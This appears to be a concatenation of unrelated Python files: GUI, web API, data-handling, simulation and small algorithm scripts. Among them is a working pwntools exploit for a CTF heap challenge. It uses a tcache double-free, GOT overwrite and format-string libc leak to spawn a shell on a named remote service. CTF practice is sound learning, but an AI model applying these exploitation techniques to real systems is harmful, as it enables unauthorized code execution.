        self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))
        self.menubar.setObjectName("menubar")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        # Populate the pickers and hook the buttons up.
        self.manageComboBox()
        self.add1.clicked.connect(self.add1Func)
        self.add2.clicked.connect(self.add2Func)
        self.add3.clicked.connect(self.add3Func)
        self.calcbtn.clicked.connect(self.calc)
        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        """Set all user-visible widget texts (generated translation hook)."""
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
        self.calcbtn.setText(_translate("MainWindow", "Calculate"))
        self.add1.setText(_translate("MainWindow", "Add"))
        self.add3.setText(_translate("MainWindow", "Add"))
        self.add2.setText(_translate("MainWindow", "Add"))
        self.label_1.setText(_translate("MainWindow", "TextLabel"))
        self.label_2.setText(_translate("MainWindow", "TextLabel"))
        self.label_3.setText(_translate("MainWindow", "TextLabel"))
        self.label.setText(_translate("MainWindow", "Prices comparing"))
        self.price1.setText(_translate("MainWindow", "Shufersal price:"))
        self.price2.setText(_translate("MainWindow", "Storage market price:"))
        self.price3.setText(_translate("MainWindow", "Rami levi price:"))
    def manageComboBox(self):
        """Load store data via MakeData and fill all three combo boxes."""
        maker = MakeData()
        maker.makeAll()
        for i in range(len(maker.data_shufersal)):
            self.shuf.append(maker.data_shufersal[i])
            self.comboBox1.addItem(maker.data_shufersal[i].product_name)
        for j in range(len(maker.data_market)):
            self.market.append(maker.data_market[j])
            self.comboBox_2.addItem(maker.data_market[j].product_name)
        for k in range(len(maker.data_ramilevi)):
            self.ramilevi.append((maker.data_ramilevi[k]))
            self.comboBox_3.addItem(maker.data_ramilevi[k].product_name)
    def add1Func(self):
        """Add the selected Shufersal product to its list label and basket."""
        text = str(self.comboBox1.currentText())
        all_text = self.label_1.text() + "\n" + text
        self.label_1.setText(all_text)
        for i in range(len(self.shuf)):
            if (self.comboBox1.currentText() == self.shuf[i].product_name):
                self.product_shufersal.append(self.shuf[i])
    def add2Func(self):
        """Add the selected storage-market product to its list label and basket."""
        text = str(self.comboBox_2.currentText())
        all_text = self.label_2.text() + "\n" + text
        self.label_2.setText(all_text)
        for i in range(len(self.market)):
            if (self.comboBox_2.currentText() == self.market[i].product_name):
                self.product_market.append(self.market[i])
    def add3Func(self):
        """Add the selected Rami Levi product to its list label and basket."""
        text = str(self.comboBox_3.currentText())
        all_text = self.label_3.text() + "\n" + text
        self.label_3.setText(all_text)
        for i in range(len(self.ramilevi)):
            if (self.comboBox_3.currentText() == self.ramilevi[i].product_name):
                self.product_ramilevi.append(self.ramilevi[i])
    def calc(self):
        """Sum each basket's prices and display the three totals."""
        shuf_total = 0
        market_total = 0
        ramilevi_total = 0
        for i in range(len(self.product_shufersal)):
            shuf_total += float(self.product_shufersal[i].price)
        for j in range(len(self.product_market)):
            market_total += float(self.product_market[j].price)
        for k in range(len(self.product_ramilevi)):
            ramilevi_total += float(self.product_ramilevi[k].price)
        self.price1.clear()
        self.price1.setText("Shufersal price : " + str(shuf_total))
        self.price2.clear()
        self.price2.setText("Storage market price : " + str(market_total))
        self.price3.clear()
        self.price3.setText("Rami Levi price : " + str(ramilevi_total))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
'''
Created on Nov 8, 2016
@author: micro
'''
import cv2
import numpy as np
# Stream the default webcam, showing the raw and grayscale feeds side by side
# until 'q' is pressed.
cap = cv2.VideoCapture(0)
while True:
    ret, frame = cap.read()  # ret is True while frames keep arriving
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    cv2.imshow("frame", frame)
    cv2.imshow("gray", gray)
    if cv2.waitKey(1) & 0xFF == ord("q"):
        break
# Release the camera and close both preview windows.
cap.release()
cv2.destroyAllWindows()
import math
from phi.torch.flow import *
# Train an invertible u-net to predict the smoothness of noise grids.
net = invertible_net(1, 3, True, 'u_net', 'SiLU')
optimizer = adam(net, learning_rate=1e-3)
print(parameter_count(net))
def loss_function(smoothness: Tensor):
    """L2 loss between the net's output on a noise grid and the smoothness
    value that generated that grid."""
    grid = CenteredGrid(Noise(smoothness=smoothness), x=8, y=8)
    pred_smoothness = field.native_call(net, grid)
    return math.l2_loss(pred_smoothness - smoothness)
# NOTE(review): `math` here is phi's math module (re-exported by the star
# import), shadowing the stdlib `math` imported above — confirm intended.
gt_smoothness = math.random_uniform(batch(examples=10), low=0.5, high=1)
viewer = view(gui='dash', scene=True)
for i in viewer.range():
    if i > 100: break  # cap training at ~100 iterations
    loss = update_weights(net, optimizer, loss_function, gt_smoothness)
    if i % 10 == 0: print(f'Iter : {i}, Loss : {loss}')
    viewer.log_scalars(loss=loss)
# Evaluation: forward prediction, then inverse reconstruction through the net.
grid = CenteredGrid(Noise(scale=1.0, smoothness=gt_smoothness), x=8, y=8)
pred = field.native_call(net, grid, False)
reconstructed_input = field.native_call(net, pred, True)
print('Loss between Predicted Tensor and original grid', math.l2_loss(pred - grid))
print('Loss between Predicted Tensor and GT tensor', math.l2_loss(pred - gt_smoothness))
print('Loss between Reconstructed Input and original grid:', math.l2_loss(reconstructed_input - grid))
|
from heapq import heappush, heappop
from random import randint
def heap_sort(array):
    """Sort `array` in place (ascending) via a binary heap.

    Pushes every element onto a heap, then pops them back in order.
    """
    heap = []
    for value in array:
        heappush(heap, value)
    for idx in range(len(heap)):
        array[idx] = heappop(heap)
def main():
    """Stress demo: heap-sort ten million random ints.

    NOTE(review): printing a 10-million-element list twice produces enormous
    console output; presumably intentional for this benchmark-style script.
    """
    a = []
    for i in range(10000000):
        s = randint(0, 10000000)
        a.append(s)
    print(a)
    heap_sort(a)
    print(a)
if __name__ == '__main__':
    main()
|
import pandas as pd
import random
from openpyxl import load_workbook
import numpy as np
import sys
def read_data(path=None, sheet_name="Sheet1", input_num=101, label_num=40, mode="train"):
    """Read sample data from an xlsx file.

    :param path: file path (required; the process exits if omitted)
    :param sheet_name: worksheet name
    :param input_num: number of leading input columns
    :param label_num: number of trailing label columns (train mode only)
    :param mode: "train" expects input_num + label_num columns; any other
        value treats the sheet as unlabeled test data
    :return: (inputs ndarray, labels ndarray or None for test data)
    """
    if path is None:
        print("请输入文件路径!")
        sys.exit()
    df = pd.read_excel(path, header=None, sheet_name=sheet_name)  # read data
    df = df.values  # convert to a numpy array
    # BUG FIX: previously `mode is "train"` compared string identity, which
    # is implementation-dependent; use equality.
    if mode == "train":
        # Total column count must equal input_num + label_num.
        assert input_num + label_num == np.shape(df)[1]
        data_inputs = df[:, :input_num]   # slice: sample inputs
        data_labels = df[:, input_num:]   # slice: sample labels
    else:
        # Test data: every column is an input, no labels.
        assert input_num == np.shape(df)[1]
        data_inputs = df[:, :]
        data_labels = None
    return data_inputs, data_labels
def write_data(data, path=None, sheet_name=1):
    """Append `data` column-wise to the sheet and rewrite the workbook.

    :param data: 2-D values concatenated to the right of the existing columns
    :param path: xlsx file path (required; the process exits if omitted)
    :param sheet_name: worksheet to read and rewrite
    """
    if path is None:
        print("请输入文件路径!")
        sys.exit()
    df = pd.read_excel(path, header=None, sheet_name=sheet_name)  # read existing data
    df = df.values  # convert to a numpy array
    data_df = pd.DataFrame(np.concatenate((df, np.array(data)), axis=1))
    writer = pd.ExcelWriter(path)
    data_df.to_excel(writer, sheet_name=sheet_name, header=None, index=None)
    # NOTE(review): ExcelWriter.save() is deprecated/removed in recent pandas;
    # newer code should use the writer as a context manager — confirm version.
    writer.save()
    print("结果已保存!")
def generate_batch(data_inputs, data_labels, batch_size=32):
    """Yield one randomly sampled training batch.

    :param data_inputs: sample inputs, indexable by a list of ints (e.g. ndarray)
    :param data_labels: sample labels, same indexing
    :param batch_size: number of samples drawn without replacement
    :return: generator yielding (x_batch, y_batch, sampled_indices)
    """
    # Renamed from `slice`, which shadowed the builtin of the same name.
    indices = random.sample(range(len(data_inputs)), batch_size)
    x_batch = data_inputs[indices]
    y_batch = data_labels[indices]
    # NOTE(review): the third element was called y_one_hot but is simply the
    # raw index list, not a one-hot encoding; the yielded value is unchanged.
    yield x_batch, y_batch, indices
if __name__ == '__main__':
    # Smoke test: parse the bundled workbook with the default column layout.
    read_data(path='data/54.xlsx')
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from handlers.service.UserService import UserService
class UserHandler:
    """Thin controller that delegates user lookups to UserService."""

    def getUsersByDeptid(self, deptid):
        """Return the users belonging to department `deptid`."""
        return UserService().getUsersByDeptid(deptid)
|
# -*- coding: UTF-8 -*
data = {
"station_train_code": '',
"from_station_name": '',
"to_station_name": '',
'start_time': '',
'end': '',
"lishi": '',
"swz_num": '',
"zy_num": '',
"ze_num": '',
"dw_num": '',
"gr_num": '',
"rw_num": '',
"yw_num": '',
"rz_num": '',
"yz_num": '',
"wz_num": '',
"qt_num": '',
"note_num": ''
}
name = [
"station_train_code",
"from_station_name",
'start_time',
"lishi",
"swz_num",
"zy_num",
"ze_num",
"gr_num",
"rw_num",
"dw_num",
"yw_num",
"rz_num",
"yz_num",
"wz_num",
"qt_num",
"note_num"
]
info = {
'from_station': '',
'to_station': '',
'from_date': ''
}
pricesDic = {
'A': '',
'B': '',
'C': '',
'D': '',
'E': '',
'F': '',
'G': '',
'H': '',
'I': '',
'J': ''
}
priceName = [
"swz_num",
"dw_num",
"zy_num",
"ze_num",
"gr_num",
"rw_num",
"yw_num",
"rz_num",
"yz_num",
"wz_num"
]
|
import contextlib
from pathlib import (
Path,
)
import pytest
from lll.parser import (
parse_s_exp,
)
# Fixture locations relative to this conftest.
FIXTURES_PATH = Path(__file__).parent / 'fixtures'
UNPARSEABLE_FIXTURES_PATH = FIXTURES_PATH / 'unparseable'
# Sorted so test parametrization order is stable across runs.
FIXTURES = list(sorted(FIXTURES_PATH.glob('*.lisp')))
UNPARSEABLE_FIXTURES = list(sorted(UNPARSEABLE_FIXTURES_PATH.glob('*.lisp')))
def get_fixture_path_id(path: Path) -> str:
    """Use the fixture's absolute path as its pytest parameter id."""
    return str(path.resolve())
@contextlib.contextmanager
def _open_fixture_file(filename, *args):
    """Context manager yielding an open handle to the named fixture file.

    Extra positional args are forwarded to open() (e.g. the mode).
    """
    with open(FIXTURES_PATH / filename, *args) as handle:
        yield handle
def _get_fixture_contents(filename):
    """Return the full text of the named fixture file."""
    with _open_fixture_file(filename, 'r') as handle:
        return handle.read()
@pytest.fixture(
    params=FIXTURES,
    ids=get_fixture_path_id,
)
def parseable_lll_file(request):
    """Parametrized over every parseable .lisp fixture path."""
    return request.param
@pytest.fixture(
    params=UNPARSEABLE_FIXTURES,
    ids=get_fixture_path_id,
)
def unparseable_lll_file(request):
    """Parametrized over every deliberately unparseable .lisp fixture path."""
    return request.param
@pytest.fixture
def open_fixture_file():
    """Expose the fixture-file opener helper to tests."""
    return _open_fixture_file
@pytest.fixture
def get_fixture_contents():
    """Expose the fixture-file reader helper to tests."""
    return _get_fixture_contents
@pytest.fixture
def get_parsed_fixture():
    """Return a helper that reads a fixture file and parses it as s-expressions."""
    def _get_parsed_fixture(filename):
        return parse_s_exp(_get_fixture_contents(filename))
    return _get_parsed_fixture
|
from pwn import *
import time
import sys
def alloc(ind, size, data):
    """Drive the target's menu: option 1 — allocate slot `ind` of `size`
    bytes and write `data` (uses the global pwntools `proc`)."""
    proc.sendlineafter(b': ', b'1')
    proc.sendlineafter(b':', f'{ind}'.encode())
    proc.sendlineafter(b':', f'{size}'.encode())
    proc.sendafter(b':', data)
def realloc(ind, size, data):
    """Menu option 2 — realloc slot `ind` to `size` bytes and write `data`."""
    proc.sendlineafter(b': ', b'2')
    proc.sendlineafter(b':', f'{ind}'.encode())
    proc.sendlineafter(b':', f'{size}'.encode())
    proc.sendafter(b':', data)
def realloc_free(ind):
    """Menu option 2 with size 0 — realloc(ptr, 0), which frees the chunk
    without the program clearing its slot pointer."""
    proc.sendlineafter(b': ', b'2')
    proc.sendlineafter(b':', f'{ind}'.encode())
    proc.sendlineafter(b':', b'0')
def free(ind):
    """Menu option 3 — free slot `ind`."""
    proc.sendlineafter(b': ', b'3')
    proc.sendlineafter(b':', f'{ind}'.encode())
def exit():
    """Menu option 4 — exit the target.

    NOTE(review): shadows the builtin exit(); harmless in this script but
    worth renaming if it grows.
    """
    proc.sendlineafter(b': ', b'4')
def printf(buf):
    """Send `buf` through menu option 3's argument prompt — after atoll's GOT
    entry is overwritten with printf@plt this becomes a format-string primitive."""
    proc.sendlineafter(b': ', b'3')
    proc.sendafter(b':', buf)
def overlap(size):
    """Heap grooming for chunks of `size`.

    NOTE(review): indentation reconstructed — loop bodies assumed to be the
    three calls following each `for`; confirm against the original exploit.
    """
    # Cycle small->size reallocations seven times (tcache filling pattern).
    for i in range(7):
        alloc(0, 0x18, b'A')
        realloc(0, size, b'A')
        free(0)
    alloc(0, 0x18, b'A')
    realloc(0, size, b'A')
    alloc(1, 0x18, b'A')
    realloc(1, size, b'A')
    # Double-free setup: slot 0 freed via realloc(.,0), then both slots freed.
    realloc_free(0)
    free(1)
    free(0)
    for i in range(7):
        alloc(0, size, b'A')
        realloc(0, 0x18, b'A')
        free(0)
def set_target(size, target):
    """Plant `target` as a forward pointer for the `size` tcache bin so a later
    allocation of that size returns `target`.

    NOTE(review): indentation reconstructed — the inner realloc loop and
    free(1) are assumed to sit inside the range(2) loop; confirm.
    """
    alloc(0, size, p64(target))
    # Shrink step-wise, rewriting the pointer at each size class.
    for i in range(size - 0x20, 0, -0x20):
        realloc(0, i, p64(target))
    for i in range(2):
        alloc(1, size, b'A')
        for j in range(size - 0x20, 0, -0x20):
            realloc(1, j, b'A')
        free(1)
    free(0)
def exploit():
    """Full chain: overwrite atoll@GOT with printf@plt, leak libc via a
    format string, then overwrite it again with system and run /bin/sh."""
    if len(sys.argv) <= 1:
        # Local run: pause so a debugger can attach.
        input('attach to pid: {}'.format(proc.proc.pid))
    atoll_got = 0x404048
    printf_plt = 0x401076
    # Prepare overlapping/poisoned tcache state for two size classes.
    overlap(0x58)
    overlap(0x78)
    for i in range(7):
        alloc(0, 0x58, b'A')
        realloc(0, 0x18, b'A')
        free(0)
    # Point both poisoned bins at atoll's GOT slot.
    set_target(0x58, atoll_got)
    set_target(0x78, atoll_got)
    # First GOT write: atoll -> printf@plt, turning every index prompt into printf.
    alloc(0, 0x58, flat(printf_plt))
    # Leak a stack/libc pointer via %p and derive the libc base.
    printf("%p|%p|%p>>>")
    libc = proc.recvuntil(b'>>>').split(b'|')[2]
    libc = int(libc[:-3], 16)
    if len(sys.argv) <= 1:
        # local
        libc -= 0x101ac9
        system = libc + 0x41c50
    else:
        # remote
        libc -= 0x12e009
        system = libc + 0x52fd0
    log.info('libc: ' + hex(libc))
    # alloc(1, 0x78, p64(system))
    # Second GOT write done manually: "%120p" pads so atoll's slot receives system.
    proc.sendlineafter(b': ', b'1')
    proc.sendafter(b':', b'A' * 1)
    proc.sendafter(b':', b'%120p')
    proc.sendafter(b':', p64(system))
    # atoll is now system: sending "/bin/sh" as the index spawns a shell.
    proc.sendlineafter(b': ', b'1')
    proc.sendlineafter(b':', b'/bin/sh')
    proc.sendline(b'cat /home/re-alloc/flag')
    # FLAG{Heeeeeeeeeeeeeeeeeeeeeee4p}
if __name__ == '__main__':
    context.arch = 'amd64'
    # Any extra CLI argument selects the remote CTF service; default is local.
    connect = 'nc eductf.zoolab.org 10106'
    connect = connect.split(' ')
    if len(sys.argv) > 1:
        proc = remote(connect[1], int(connect[2]))
    else:
        proc = process(['./re-alloc'])
    exploit()
    proc.interactive()
|
#!/usr/bin/python3
'''
Package initializer
'''
from models.base_model import BaseModel
from models.country import Country
from models.city import City
from models.trip import Trip
from models.user import User
from models.notification import Notification
from models.continent import Continent
from os import getenv
from models.engine.db_storage import DBStorage
classes = {"BaseModel": BaseModel, "Country": Country,
"City": City, "Trip": Trip, "User": User,
"Notification": Notification, "Continent": Continent}
storage = DBStorage()
|
# Simulation
RANDOM_SEED = 42
# Traffic-load sweep: presumably TRAFFIC_LOAD_NUM levels between START and END.
TRAFFIC_LOAD_NUM = 20
TRAFFIC_LOAD_START = 10
TRAFFIC_LOAD_END = 3000
SIMULATIONS_PER_MODEL = 100
# Grid
GRID_WIDTH = 10
GRID_HEIGHT = 10
# Road
ROAD_PROBABILITY = .9 # The probability of an intersection being connected to a neighbouring one (one-directional)
ROAD_LENGTH_BASE = 1 # The number of steps it takes to travel a road
# Weighted offset pool: 85% +0, 10% +1, 5% +2 (presumably sampled at random).
ROAD_LENGTH_DIFF = 85*[0] + 10*[+1] + 5*[+2]
# Lane
LANE_PROBABILITY = .9 # The probability of a lane at the end of a road
TRAFFIC_LIGHT_LENGTH = 1 # How many steps a traffic light will be GREEN
FLOW_THROUGH_BASE = 8 # The number of vehicles that can drive in one step when a light turns GREEN
# Weighted offset pool for flow-through capacity: 5% +1, 80% 0, 10% -1, 5% -2.
FLOW_THROUGH_DIFF = 5*[+1] + 80*[0] + 10*[-1] + 5*[-2]
# Vehicle
# Trip length bounds scale with the grid size.
VEHICLE_MIN_ROADS = (GRID_WIDTH+GRID_HEIGHT) // 2
VEHICLE_MAX_ROADS = (GRID_WIDTH+GRID_HEIGHT) * 2
# Results
RESULTS_FOLDER_PATH = './results/'
def to_string():
    """One-line summary of the tunable simulation parameters
    (used e.g. to label result files/plots)."""
    parts = [
        "spm={}".format(SIMULATIONS_PER_MODEL),
        "w={}".format(GRID_WIDTH),
        "h={}".format(GRID_HEIGHT),
        "r_base={}".format(ROAD_LENGTH_BASE),
        "t={}".format(TRAFFIC_LIGHT_LENGTH),
        "f_base={}".format(FLOW_THROUGH_BASE),
    ]
    return ", ".join(parts)
|
from libs.auth import Auth
from config import APP_URL, LOG, USER, PASSWORD
def test_login():
    """Log in against APP_URL with the configured credentials; expect HTTP 200."""
    LOG.info("test_login")
    response = Auth().login(APP_URL, USER, PASSWORD)
    LOG.debug(response.json())
    assert response.ok
    assert response.status_code == 200
|
def remove_url_anchor(url):
    """Return `url` with any anchor/fragment removed.

    Everything from the first '#' onward is dropped. BUG FIX: the previous
    version only truncated URLs containing exactly one '#', leaving URLs with
    multiple '#' characters untouched.
    """
    return url.split('#', 1)[0]
def SubsetSum(N, s):
    """Fill the global dp table: dp[i][j] = number of subsets of arr[:i]
    summing to j, for 0 <= j <= s.

    Uses module-level `arr` (input values) and `dp` (an (N+1) x (s+1)
    zero-initialized table created by the caller).
    """
    global arr, dp
    for i in range(N + 1):
        for j in range(s + 1):
            if j == 0:
                dp[i][j] = 1  # the empty subset always reaches sum 0
            elif i == 0:
                dp[i][j] = 0  # no items but a positive target: impossible
            elif j >= arr[i - 1]:
                # Either skip item i-1 or include it.
                dp[i][j] = dp[i - 1][j] + dp[i - 1][j - arr[i - 1]]
            else:
                # BUG FIX: previously dp[i-1][j - arr[i-1]] was read even when
                # j < arr[i-1]; the negative index wrapped to the end of the
                # row and corrupted the counts. The item cannot be included.
                dp[i][j] = dp[i - 1][j]
def Count(T):
    """Print the number of +/- sign assignments of `arr` totaling T.

    Scans i in 0..s//2 for s - 2*i == T (i is the sum of the negated subset)
    and prints dp[-1][i]; the for/else prints 0 when no such i exists
    (including when s - T is odd). Uses module-level `dp` and `s`.
    """
    global dp,s
    for i in range (s//2 + 1) :
        if (s - 2*i == T) :
            print(dp[-1][i])
            break
    else :
        print(0)
# Read the array and target, build the DP table, and print the answer.
N = int(input("Enter size : "))
arr = list(map(int , input().split()))
T = int(input("TargetSum : "))
s = sum(arr)
# Only sums up to s//2 are needed: the negated subset's sum is at most s//2.
dp = [[0 for i in range (s//2 + 1)] for j in range(N+1)]
SubsetSum(N,s//2)
Count(T)
|
# Read an integer; print "Fizz" when divisible by 3, otherwise echo it.
numero = int(input("digite um numero: "))
calculo = numero%3  # remainder mod 3
if calculo == 0 :
    print("Fizz")
else:
    print(numero)
|
from rest_framework import viewsets
from .models import Article
from .serializerModel import ArticlesSerializer
from rest_framework.response import Response
from django.shortcuts import get_object_or_404
from rest_framework import status
class ArticleViewset(viewsets.ViewSet):
    """CRUD endpoints for Article objects."""

    def list(self, request):
        """Return all articles, serialized."""
        queryset = Article.objects.all()
        serializer = ArticlesSerializer(queryset, many=True)
        return Response(serializer.data)

    def retrieve(self, request, pk=None):
        """Return one article by primary key (404 when missing)."""
        # BUG FIX: was `request.objects.all()` — querysets come from the model.
        queryset = Article.objects.all()
        article = get_object_or_404(queryset, pk=pk)
        serializer = ArticlesSerializer(article)
        return Response(serializer.data)

    def create(self, request):
        """Validate and save a new article from the request payload."""
        # BUG FIX: the payload must be passed as `data=`; passing it
        # positionally treats it as an instance and .is_valid() raises.
        serializer = ArticlesSerializer(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status.HTTP_200_OK)
        return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)

    def update(self, request, pk=None):
        """Replace an existing article with the request payload."""
        # BUG FIX: was `request.objects.all()`, saved without validating,
        # and returned nothing.
        queryset = Article.objects.all()
        article = get_object_or_404(queryset, pk=pk)
        serializer = ArticlesSerializer(article, data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status.HTTP_200_OK)
        return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)

    # def delete(self, request, pk=None):  # not implemented yet
|
from pony import orm
db = orm.Database()
# Define animals table
class Animal(db.Entity):
    """Pony ORM entity for the animals table: auto id, required name and age."""
    id = orm.PrimaryKey(int, auto=True)
    name = orm.Required(str)
    age = orm.Required(int)
# Create add animal function
@orm.db_session
def add_animal(name: str, age: int):
    """Insert a new Animal row (commits when the db_session closes).

    Annotation corrected: age is an int per the entity's Required(int).
    """
    Animal(name=name,age=age)
|
from rest_framework.decorators import action
import secrets
from rest_framework.response import Response
from rest_framework import status, mixins, viewsets
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from core.models import Device, Audience, Advertising
from advertising import serializers
class DeviceViewSet(viewsets.GenericViewSet, mixins.ListModelMixin, mixins.CreateModelMixin):
    """Manage devices in the database"""
    queryset = Device.objects.all()
    serializer_class = serializers.DeviceSerializer
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAuthenticated,)
    def get_queryset(self):
        # Only the requesting user's devices, ordered by name descending.
        return self.queryset.filter(user=self.request.user).order_by('-name')
    def perform_create(self, serializer):
        # Attach the owner and a fresh random URL-safe API key to each device.
        serializer.save(user=self.request.user, key=secrets.token_urlsafe(16))
class AudienceViewSet(viewsets.GenericViewSet, mixins.ListModelMixin, mixins.CreateModelMixin):
    """Manage audiences in the database.

    Unlike DeviceViewSet, audiences are not filtered per user.
    """
    queryset = Audience.objects.all()
    serializer_class = serializers.AudienceSerializer
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAuthenticated,)
    def get_queryset(self):
        # All audiences, ordered by name descending.
        return self.queryset.order_by('-name')
    def perform_create(self, serializer):
        serializer.save()
class AdvertisingViewSet(viewsets.ModelViewSet):
    """Manage advertising in the database"""
    serializer_class = serializers.AdvertisingSerializer
    queryset = Advertising.objects.all()
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAuthenticated,)

    def _params_to_ints(self, qs):
        """Convert a comma-separated string of IDs to a list of integers"""
        return [int(str_id) for str_id in qs.split(',')]

    def get_serializer_class(self):
        """Return the appropriate serializer class for the current action"""
        if self.action == 'retrieve':
            return serializers.AdvertisingDetailSerializer
        if self.action == 'upload_image':
            return serializers.AdvertisingImageSerializer
        return self.serializer_class

    def get_queryset(self):
        """Retrieve the authenticated user's advertising, optionally filtered
        by ?devices= and ?audiences= comma-separated ID lists."""
        devices = self.request.query_params.get('devices')
        audiences = self.request.query_params.get('audiences')
        queryset = self.queryset
        if devices:
            # BUG FIX: the parsed integer list was computed but the raw
            # string was passed to the __in filter.
            devices_ids = self._params_to_ints(devices)
            # NOTE(review): the lookup names 'tags' / 'ingredients' below look
            # copied from another app — verify against the Advertising model.
            queryset = queryset.filter(tags__id__in=devices_ids)
        if audiences:
            audiences_ids = self._params_to_ints(audiences)
            queryset = queryset.filter(ingredients__id__in=audiences_ids)
        return queryset.filter(user=self.request.user)

    def perform_create(self, serializer):
        """Create a new advertising owned by the requesting user"""
        serializer.save(user=self.request.user)

    @action(methods=['POST'], detail=True, url_path='upload-image')
    def upload_image(self, request, pk=None):
        """Upload an image to an advertising"""
        advertising = self.get_object()
        serializer = self.get_serializer(
            advertising,
            data=request.data
        )
        if serializer.is_valid():
            serializer.save()
            return Response(
                serializer.data,
                status=status.HTTP_200_OK
            )
        return Response(
            serializer.errors,
            status=status.HTTP_400_BAD_REQUEST
        )
|
from scapy.all import *
import numpy as np
# Index of the next slot to overwrite in the circular window.
it = 0
# Sampling interval in seconds (also the width of one window slot).
time = 1
# Bytes of IP traffic seen during the current interval.
size = 0
# One slot per interval across a 60-second sliding window.
flow_window = np.zeros(60//time)
def get_traffic_size_per_minute():
    """Return the total bytes recorded across the whole sliding window."""
    return np.sum(flow_window)
def traffic_monitor_callbak(pkt):
    """Sniff callback: accumulate each IP packet's total length into `size`."""
    global size
    if IP in pkt:
        size += int(pkt.sprintf("%IP.len%"))
def timeout(time=time):
    """Sample traffic forever: every `time` seconds record the bytes of IP
    traffic seen into the circular `flow_window` buffer and print the
    current per-minute total.

    Fix: the previous implementation recursed into itself once per
    interval, which overflows the Python call stack after roughly 1000
    intervals; a loop gives the same behaviour without unbounded recursion.
    """
    global it
    global size
    while True:
        size = 0
        # Block for `time` seconds, counting IP bytes via the callback.
        sniff(prn=traffic_monitor_callbak, store=0, timeout=time)
        flow_window[it] = size
        it = (it + 1) % (flow_window.shape[0])
        print(get_traffic_size_per_minute())  # comment it
timeout(time)
|
from django.forms import ModelForm
from django import forms
from .models import category, gif
class GifForm(ModelForm):
    """Form for creating/editing a `gif` record."""
    class Meta:
        model = gif
        # Only these model fields are exposed on the form.
        fields = ['uploader_name', 'title', 'url']
class CategoriesForm(ModelForm):
    """Form for creating/editing a `category` and its gif membership."""
    class Meta:
        model = category
        fields = ['name', 'gifs']
# GifForm
# uploader_name
# title
# url
|
from songs.models import Song, ArtistContribution, BandContribution
from django.contrib import admin
class ArtistContributionInline(admin.TabularInline):
    """Edit ArtistContribution rows inline on the Song admin page."""
    model = ArtistContribution
    extra = 1  # one blank row for adding a new contribution
class BandContributionInline(admin.TabularInline):
    """Edit BandContribution rows inline on the Song admin page."""
    model = BandContribution
    extra = 1  # one blank row for adding a new contribution
class SongAdmin(admin.ModelAdmin):
    """Admin configuration for Song, with contribution inlines."""
    inlines = (ArtistContributionInline,BandContributionInline,)
    # Slug is auto-filled from title + disambiguator while typing.
    prepopulated_fields = { 'slug' : ['title', 'disambig'] }
    fieldsets = [
        ('Identification', {'fields': ['title', 'original_title', 'disambig', 'slug', 'published']}),
        ('Content', {'fields': ['capo_fret', 'lyrics',]}),
        ('Additional', {'fields': ['link_youtube', 'link_wrzuta', 'score1', 'score2', 'score3']}),
    ]
# Register Song with its customized admin.
admin.site.register(Song, SongAdmin)
|
from flask import Flask, request, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
from flask_marshmallow import Marshmallow
from flask_heroku import Heroku
import os
app = Flask(__name__)
# Heroku integration sets DATABASE_URL-based config when deployed.
heroku = Heroku(app)
basedir = os.path.abspath(os.path.dirname(__file__))
# Local fallback: SQLite file next to this module.
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \
    os.path.join(basedir, "app.sqlite")
CORS(app)
db = SQLAlchemy(app)
ma = Marshmallow(app)
class User(db.Model):
    """A user profile: avatar image URL, unique name, short description."""
    __tablename__ = "users"
    id = db.Column(db.Integer, primary_key=True)
    image = db.Column(db.String(), nullable=False)
    name = db.Column(db.String(), unique=True, nullable=False)
    description = db.Column(db.String(420), nullable=True)
    def __init__(self, image, name, description):
        self.image = image
        self.name = name
        self.description = description
class UserSchema(ma.Schema):
    """Marshmallow schema controlling which User fields are serialized."""
    class Meta:
        fields = ("id", "image", "name", "description")
# Single-object and list serializers.
user_schema = UserSchema()
users_schema = UserSchema(many=True)
@app.route("/add-user", methods=["POST"])
def add_user():
    """Create a user from the JSON body and return the new record as JSON.

    Expects keys "image", "name" and "description" in the request body.
    """
    image = request.json["image"]
    name = request.json["name"]
    description = request.json["description"]
    record = User(image, name, description)
    db.session.add(record)
    db.session.commit()
    # Fix: the committed record already has its primary key populated —
    # re-querying the row we just inserted was a redundant round trip.
    return user_schema.jsonify(record)
@app.route("/turpentine", methods=["GET"])
def get_all_users():
    """Return every user record as a JSON array."""
    all_users = User.query.all()
    # NOTE(review): `.dump(...).data` matches marshmallow < 3; marshmallow 3
    # returns the data directly from dump() — confirm the pinned version.
    result = users_schema.dump(all_users).data
    return jsonify(result)
@app.route("/turpentine/<id>", methods=["GET"])
def get_user_by_name(id):
    # NOTE(review): despite the name, this looks the user up by primary key,
    # not by name.  Renaming would change the Flask endpoint name, so it is
    # only flagged here.
    record = User.query.get(id)
    return user_schema.jsonify(record)
@app.route("/edit/<id>", methods=["PUT"])
def edit_user(id):
    """Overwrite a user's image, name and description from the JSON body."""
    user = User.query.get(id)
    payload = request.json
    # Read all values first, then assign, so a missing key fails early.
    values = (payload["image"], payload["name"], payload["description"])
    user.image, user.name, user.description = values
    db.session.commit()
    return user_schema.jsonify(user)
@app.route("/delete/<id>", methods=["DELETE"])
def delete_user(id):
    """Delete the user with the given id and return a confirmation string."""
